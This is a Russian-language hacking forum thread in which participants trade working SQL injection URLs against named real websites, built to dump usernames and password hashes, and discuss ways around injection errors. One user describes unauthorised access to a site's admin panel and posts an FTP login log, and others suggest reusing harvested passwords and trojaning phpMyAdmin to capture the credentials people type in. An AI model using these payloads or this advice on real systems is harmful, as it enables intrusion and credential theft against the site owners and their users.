лови )) http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,version(),3,4,5,6,7/* ====================== http://www.mbc.edu/news/r_detail.asp?id=-2087+union+select+1,concat_ws(0x3a,username,pword_hash),3,4,5,6,7+from+user/* что за тип хеша - не знаю можт кодировка !?
Пытаюсь сделать Code: script.php?id=199'union+select+1,2,user(),4,5,6,7,8,9,10/* а вылазит: Code: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' SELECT *, UNIX_TIMESTAMP(`itemdate`) AS `unix_time` FROM `umsec_news_items` WHERE `id`='199'union select 1,2,user(),4,5,6,7,8,9,10/*' Ладно, кодирую в hex Code: script.php?id=-113'+union+select+1,2,0x76657273696f6e2829,4,5,6,7,8,9,10/* А там где должна быть инфа о версии показывает тупо слово version() Можно где-нить об етом почитать или что-нить узнать подробнее?
USAkid или использовать конструкцию unhex(hex()) кстати намного удобнее чем aes_decrypt(aes_encrypt,0x71),0x71)
имею доступ к панели управления http://www.neo-nvk.ru/newsphp/newsok/admin.php а на фтп немогу приконектится. конектится вроде нормально... пароль и логин признаёт.. а потом срывается Response: 550 Permission denied. Error: Could not retrieve directory listing
Наиболее частые случаи (везде по разному): 1. Базовая авторизация на директории с ПМА (т.е. информация о БД прописана в файл), а за доступ к директории отвечают файлы .htaccess и .htpasswd 2. Данные для подключения к БД нигде не хранятся, а вводятся ползователем, т.е. логин который он просит ввести это логин пользователя БД, а пароль соответтвенно пароль указанного пользователя БД. 3. Вроде ещё в самой БД может хранится.
Grey понятно.. в моем случаи логин и пасс пользователя БД есть но нехватает прав чтобы просмотреть mysql.user, хотел узнать пасс рута.. я имею доступ к папке phpmyadmin через шелл.. просморев файлы нече не нашел... спасибо....
DDoSька да...... но прав чтобы просмотреть нету. и еще как я знаю.. что вся база данных mysql хранится в файлах на сервере?
1 попробуй пароли что нарыл к фтп 2 если есть права - можешь протроянить пхпмуфдмин(чтобы введённые пассы сохранялись в лог)
я заходил через ай пи сервака Для доступа по FTP используйте в качестве hostname (адрес хоста) IP сервера. Информация аккаунта: Домен: neo-nvk.ru IP сервера*: 77.222.40.12 HTML: Status: Connecting to 77.222.40.12 ... Status: Connected with 77.222.40.12. Waiting for welcome message... Response: 220 (vsFTPd 1.2.2) Command: USER ******** Response: 331 Please specify the password. Command: PASS ********* Response: 230 Login successful. Command: FEAT Response: 211-Features: Response: MDTM Response: REST STREAM Response: SIZE Response: 211 End Command: SYST Response: 215 UNIX Type: L8 Status: Connected Status: Retrieving directory listing... Command: PWD Response: 257 "/" Command: TYPE A Response: 200 Switching to ASCII mode. Command: PASV Response: 550 Permission denied. Error: [COLOR=Red]Could not retrieve directory listing[/COLOR]
